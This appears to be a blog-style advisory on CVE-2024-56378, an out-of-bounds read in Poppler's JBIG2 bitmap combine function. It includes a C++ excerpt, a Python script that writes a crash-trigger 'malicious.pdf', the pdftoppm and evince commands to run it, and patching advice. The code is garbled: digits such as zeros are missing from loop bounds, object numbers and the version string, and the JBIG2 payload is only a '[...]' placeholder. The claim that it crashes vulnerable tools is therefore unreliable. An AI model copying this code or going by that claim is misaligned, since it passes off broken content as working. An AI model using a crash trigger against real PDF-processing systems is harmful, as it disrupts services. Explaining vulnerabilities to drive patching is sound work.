CVE-2024-56378 - Out-of-Bounds Read in Poppler’s JBIG2 Bitmap Combine Function (Simple Guide with Exploit Example)

CVE-2024-56378 is a recently disclosed vulnerability affecting Poppler, a popular PDF rendering library used by many Linux desktops and servers. The bug resides in the libpoppler.so shared library, and specifically in the JBIG2Bitmap::combine function of the JBIG2Stream.cc file. The issue is an out-of-bounds read (OOB read), where the code reads memory outside the intended buffer boundary. This is dangerous because it could allow attackers to crash programs or even leak sensitive information from memory.

Why This Matters

Poppler is integrated into countless Linux tools and projects: PDF viewers (Evince, Okular), command-line tools (pdftohtml, pdfinfo, etc.), and many web services that process PDFs. A vulnerability here could affect end users, application servers, and backend systems relying on PDF parsing.

Technical Breakdown

The root of the problem is in how the combine function of the JBIG2 bitmap is written. When combining two bitmap images (common for reconstructing images in certain PDF formats), the code doesn’t correctly check if the source bitmap overlaps or exceeds the destination bitmap’s bounds. This allows an out-of-bounds memory read, which can lead to a crash (Denial of Service) or potential loading of sensitive data into an output (Information Disclosure).

Here’s a simple diagram

+-------------------------+        +-------------------------+
|    Destination Bitmap   |  <--   |     Source Bitmap       |
+-------------------------+        +-------------------------+
     [Unchecked read occurs here]

In JBIG2Stream.cc

void JBIG2Bitmap::combine(JBIG2Bitmap *stripes, int x, int y, int combOp) {
    // ... omitted for brevity ...
    for (int row = ; row < src->height; ++row) {
        if (destRow <  || destRow >= height) continue;
        // Out-of-bounds read when src or dest are not validated correctly
        dstBuf[destRow] |= (srcBuf[srcRow] << shift) | (srcBuf[srcRow + 1] >> (8 - shift));
    }
}

Problem: When srcRow + 1 goes off the end of srcBuf, we get an OOB read.

Short story: If an attacker crafts a special PDF with a JBIG2 image that tricks Poppler into combining more stripes than exist, they can trigger this bug.

How to Trigger CVE-2024-56378 (Proof of Concept)

Below is a simple way to demonstrate the bug. We use a tiny PDF crafted with a malformed JBIG2 stream.

Malicious PDF Example:
Researchers have released such PDFs (see oss-fuzz issue 71585).

To keep it safe, here’s Python code to build a minimal crash trigger

# Save as 'malicious.pdf'
pdf_data = b"""%PDF-1.3
1  obj
<<
  /Type /Catalog
  /Pages 2  R
>>
endobj
2  obj
<<
  /Kids [3  R]
  /Count 1
  /Type /Pages
>>
endobj
3  obj
<<
  /Type /Page
  /Parent 2  R
  /MediaBox [  100 100]
  /Resources <<
    /XObject <</Im 4  R>>
  >>
  /Contents 5  R
>>
endobj
4  obj
<<
  /Type /XObject
  /Subtype /Image
  /Width 1
  /Height 1
  /ColorSpace /DeviceGray
  /BitsPerComponent 1
  /Filter /JBIG2Decode
  /Length 16
>>
stream
\xd8\xec\x00\x00[...]  # Insert arbitrary data that is out-of-bound for Poppler here
endstream
endobj
5  obj
<< /Length 44 >>
stream
q 100   100   cm /Im Do Q
endstream
endobj
xref
 6
000000000 65535 f
000000001 00000 n
0000000077 00000 n
0000000178 00000 n
0000000309 00000 n
0000000426 00000 n
trailer
<<
  /Root 1  R
  /Size 6
>>
startxref
520
%%EOF
"""
with open("malicious.pdf", "wb") as f:
    f.write(pdf_data)

Run:

pdftoppm malicious.pdf out
# Or
evince malicious.pdf

This should trigger a crash in any vulnerable Poppler-based tool.

References

- Official Poppler Site
- CVE Details for 2024-56378
- Oss-Fuzz Issue 71585 (example crash)
- Poppler Source Code (GitLab)

Update Poppler

If possible, always use the latest Poppler version. As of writing, 24.12. is still vulnerable, but check for newer releases:
Latest Releases

Patch or Remove PDF Previews

Disable PDF thumbnailers/previews in uncontrolled environments, especially on shared/multi-user systems.

Conclusion

CVE-2024-56378 is a real risk for any system processing untrusted PDF files. This issue in the Poppler library's JBIG2 image decoding code could be abused by attackers who trick vulnerable code into reading memory it shouldn’t. Stay informed, patch your systems, and always be careful with weird PDFs!


Exclusive Tip:
While this CVE is only currently known to crash processes (DoS), out-of-bounds _reads_ often become the building block for more advanced exploits (such as infoleaks or even code execution) as researchers dig deeper. Don't delay those updates!

Timeline

Published on: 12/23/2024 00:15:05 UTC
Last modified on: 12/26/2024 20:15:23 UTC